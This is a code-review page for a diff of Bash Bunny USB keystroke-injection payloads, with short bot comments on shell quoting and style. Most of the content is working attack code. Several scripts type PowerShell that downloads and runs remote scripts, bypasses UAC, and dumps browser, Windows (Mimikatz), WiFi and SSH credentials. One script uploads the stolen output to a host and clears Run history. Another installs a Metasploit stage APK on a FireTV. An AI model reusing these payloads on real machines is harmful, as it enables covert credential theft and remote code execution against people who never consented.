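Review bot: In the new `TARGET_OS` branch, `$TARGET_IP` reaches both `nmap` calls unquoted and unchecked, although the lease pipeline ends in `sort | uniq` and can yield no address or several. With an empty value the command runs with no target, and the branch then falls through to `UNKNOWN` with no sign that the lookup itself failed. The branch also assigns `TARGET_IP` as a plain global without `export`, unlike the `TARGET_IP` branch above it, so calling `GET TARGET_OS` silently changes that variable for the rest of the payload. Suggest a local instead, e.g. `local ip; ip=$(... | tail -n1)`, followed by `[[ -z "$ip" ]] && export TARGET_OS='UNKNOWN' && return`, and passing `"$ip"` quoted.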


@ -0,0 +1,26 @@
#!/bin/bash
#Title: Mac_Happy
# Author: thehappydinoa
# Target: Mac
# Version: 0.1
#
# Makes Mac happy by correctly setting pid and vid
# Use by running mac_happy ATTACKMODE HID <attack modes here>
#
function mac_happy() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
for i in $*;
do
command=$(echo $command $i)
done
command=$(echo $command VID_0X05AC PID_0X021E)
eval $command
}
export -f mac_happy
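Review bot: `eval $command` re-parses the caller's arguments as shell source, so any argument containing spaces, globs or shell metacharacters is split or executed instead of being passed through unchanged. The function only appends two fixed tokens, so the loop and the eval can be replaced by a direct call, `"$@" VID_0X05AC PID_0X021E`. `command` is never declared `local` or reset, so a second call in the same payload starts from the previous call's string. The guard `[[ ! $1 =~ "ATTACKMODE" ]]` is a substring match and accepts any first word that merely contains ATTACKMODE; `[[ "$1" == "ATTACKMODE" ]]` states the intent.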


@ -8,11 +8,11 @@
# REQUIRETOOL impacket
function REQUIRETOOL() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
}
export -f REQUIRETOOL


@ -13,9 +13,9 @@
function RUN() {
local os=$1
shift
[[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set
case "$os" in
WIN)
QUACK GUI r
@ -37,6 +37,13 @@ function RUN() {
QUACK DELAY 500
QUACK ENTER
;;
LINUX)
QUACK ALT F2
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER
;;
*)
# OS parameter must be one of the above
exit 1

60
payloads/extensions/setkb.sh Normal file → Executable file

@ -7,45 +7,45 @@
# Examples:
# SETKB START (set the keyboard layout to a US keyboard layout)
# SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
function SETKB() {
local state=$1
shift
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
local state=$1
shift
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
;;
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
;;
esac
esac
}
export -f SETKB


@ -1,12 +1,7 @@
LED R B 100
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACK


@ -0,0 +1,7 @@
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACk
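Review bot: The last line reads `LED ATTACk` with a lowercase `k`. If the LED helper matches state names case-sensitively (its source is not on this page), the state will not be recognised, so it should read `LED ATTACK` as in the sibling payload changed in this commit. `LED SETUP` also appears twice, once before `ATTACKMODE HID STORAGE` and again after `GET SWITCH_POSITION`; the second looks redundant.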


@ -11,8 +11,13 @@
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
# Green..............Finished
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
ATTACKMODE HID
LED R B 0
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
@ -64,12 +69,11 @@ Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
source bunny_helpers.sh
if [ -z "${TARGET_IP}" ]; then
LED R 2000
LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED G
LED FINISH


@ -1,77 +0,0 @@
#!/bin/bash
#
# Title: BrowserCreds
# Author: illwill
# Version: 0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
#script
# Blue...............Running Script
# Purple.............Got Browser Creds
LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft UserURL\, Password -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt -width 250
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000
#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\BrowserCreds\\DONE
Q ENTER
Q DELAY 100
sync
LED R B 200
FILE="/root/udisk/loot/BrowserCreds/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi


@ -1,27 +0,0 @@
# BrowserCreds
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Dumps the stored plaintext Browser passwords from Windows boxes using
Powershell HID attack, then stashes them in /root/udisk/loot/BrowserCreds/
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White (blinking) | Setting up |
| Blue (blinking) | Attack running |
| Purple (blinking) | Dumping Browser Credentials |
| Green (blinking) | Succeeded Dumping Browser Credentials |
| Red (blinking) | Failed Dumping Browser Credentials |
## Discussion
https://forums.hak5.org/index.php?/topic/40431-payload-browsercreds


@ -5,15 +5,14 @@
# Version: 1.0
# Category: Password Recovery
# Target: Windows XP SP3+
#
#
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
# access to the admin panel.
# init
LED R B
LED SETUP
# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh
GET SWITCH_POSITION
# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
@ -28,12 +27,12 @@ sync;sleep 1;sync
ATTACKMODE HID STORAGE
# wait for storage
LED R G B 100
LED STAGE1
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10
@ -41,4 +40,4 @@ sleep 10
# sync the stuff
sync;sleep 1;sync
LED G
LED FINISH


@ -6,23 +6,23 @@
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
###### Lets Start ####
LED SETUP
GET SWITCH_POSITION
# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
else
DEBUG=0
fi
mkdir -p $LOOTDIR
mkdir -p $LOOTDIR
REQUIRETOOL impacket
REQUIRETOOL impacket
# remove old Handshake Files
rm -f $SWITCHDIR/CON_*
@ -60,8 +61,8 @@ Q DELAY 5000
# Launch initial cmd
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
@ -69,7 +70,7 @@ fi
Q DELAY 1000
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
@ -77,12 +78,12 @@ Q ENTER
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
Q DELAY 1000
Q ALT j
Q DELAY 500
@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
@ -163,4 +163,4 @@ fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH
LED FINISH
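Review bot: The comment `# Source bunny_helpers.sh to get environment variables` in the `-109,7 +110,6` hunk no longer has a statement under it. The hunk header shows one line dropped there and the next visible line is the `logger` call, so the `source` line it described appears to be the one removed. Either delete the comment too or reword it to match the new flow, for example `# SWITCH_POSITION is set by GET SWITCH_POSITION above`. The payload continues outside the lines this section shows, so this is based only on the visible hunks.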


@ -1,162 +0,0 @@
#!/bin/bash
#
# Title: JackRabbit
# Author: illwill
# Version: 0.1
#
# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
#
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
# https://github.com/fireeye/SessionGopher SessionGopher .ps1
# https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
#script
# Purple...............Jackin dat loot
# Green................Jacked dat loot
# Red Blue.............PoPo caught yo ass
LED R B 200
LOOTDIR=/root/udisk/loot/JackRabbit
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
# Make the loot folder of the computername
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING md \$LOOTDIR2
Q ENTER
Q DELAY 100
# Jackin' Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
Q ENTER
Q DELAY 100
# Jackin' Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# Open 32bit powershell and Jackin' Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# UAC Bypass
Q GUI r
Q STRING powershell -c "Start-Process powershell -verb runas"
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
# Jackin' Windows creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
Q DELAY 300
Q ENTER
# Jackin' Wifi creds
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
Q ENTER
Q DELAY 100
# Jackin' SSH Creds
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
Q ENTER
Q DELAY 100
# Jackin' dem install configs
Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
Q ENTER
Q DELAY 100
# Output DONE to root of USB file to let bashbunny we're all good in the hood
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 1000
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200
else LED R;
for (( ; ; ))
do
LED R;
sleep 1;
LED B;
sleep 1;
done
fi


@ -1,25 +0,0 @@
# JackRabbit
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple (blinking) | Jackin dat loot |
| Green (blinking) | Jacked dat loot |
| RED BLUE(blinking) | PoPo caught yo ass |
## Discussion

File diff suppressed because one or more lines are too long


@ -1,4 +0,0 @@
IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');$o = Invoke-Mimidogz -DumpCred
(New-Object Net.WebClient).UploadString('http://172.16.64.1/'+$env:computername, $o)
(New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF', 'EOF');
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue


@ -1,70 +0,0 @@
#!/bin/bash
#
# Title: MrRobot Mimikatz Attack
# Author: illwill, El3ct71k
# Version: 0.2
#
# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
#
# Purple......................Setup
# Yellow single blink.........Running Powershell / Waiting for WebServer to start
# Yellow double blink.........Waiting for server connection and uploading results
# Cyan inverted single blink..Starts ethenet attack
# Cyan inverted double blink..Starts server to gets results
# Green..............Got Creds and copied to loot folder
# Red................No Creds
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED SPECIAL2
while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
sleep 1
# check for empty lootddd directory, then check results and move them to loot
if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
LED FAIL
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
rm -rf $SWITCHDIR/loot/
else
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
rm -rf $SWITCHDIR/loot/
LED FINISH
fi
else
rm -rf $SWITCHDIR/loot/
LED FAIL
fi


@ -1,28 +0,0 @@
# MrRobot
![alt tag](http://i.imgur.com/eunFr0U.jpg)
* Author: illwill & tuxxy
* Version: Version 0.2
* Target: Windows
## Description
Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
with Mimikatz then stashes them in /root/udisk/loot/MrRobot
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell / Waiting for WebServer |
| White (blinking) | WebServer started and Uploading Results |
| Purple (blinking) | DChecking for Results |
| Green | Got Creds and copied to loot folder |
| Amber (blinking) | MimiKatz failed (Not Admin?) |
| Red (blinking) | No Creds / Mimikatz failed |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40524-payload-mrrobot/ "Hak5 Forum Thread")


@ -1,34 +1,20 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM This executes LaZagne in the current directory and outputs the password file to Loot
%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)
REM Blink CAPSLOCK key


@ -1,17 +1,18 @@
#!/bin/bash
#
# Title: USB Exfiltrator
# Author: Hak5Darren
# Version: 1.1
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
# Title: Password Grabber
# Author: Razerblade
# Version: 1.2
# Target: Windows
# Props: Hak5Darren, TeCHemically, dragmus31
# Category: Credentials
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
# which in turn steals credentials by using LaZagne and saves them to /Loot
#
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"


@ -1,25 +1,33 @@
# PasswordGrabber
* Author: RazerBlade
* Creds: Hak5Darren, AlessandroZ
* Version: Version 1.1
* Firmware support: 1.1
* Target: Windows
* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
* Version: Version 1.2
* Firmware support: 1.1+
* Target: Windows 7+
## Description
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
Full read here: https://github.com/AlessandroZ/LaZagne
Downloads here: https://github.com/AlessandroZ/LaZagne/releases
## Configuration
1. You need to download the latest file from LaZagnes release page.
2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
3. Plug it in a computer and PWN them.
Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
## INFO
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
## DISCLAIMER
Hak5 is not responsible for the execution of 3rd party binaries.
## STATUS
| LED | Status |
@ -28,5 +36,5 @@ When compiled or downloaded, just drop it of to the PasswordGrabbers folder and
| Green | Attack Complete |
## Discussion
[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/


@ -24,8 +24,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP


@ -26,8 +26,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP


@ -1,62 +0,0 @@
#!/bin/bash
#
# Title: WiFiCreds
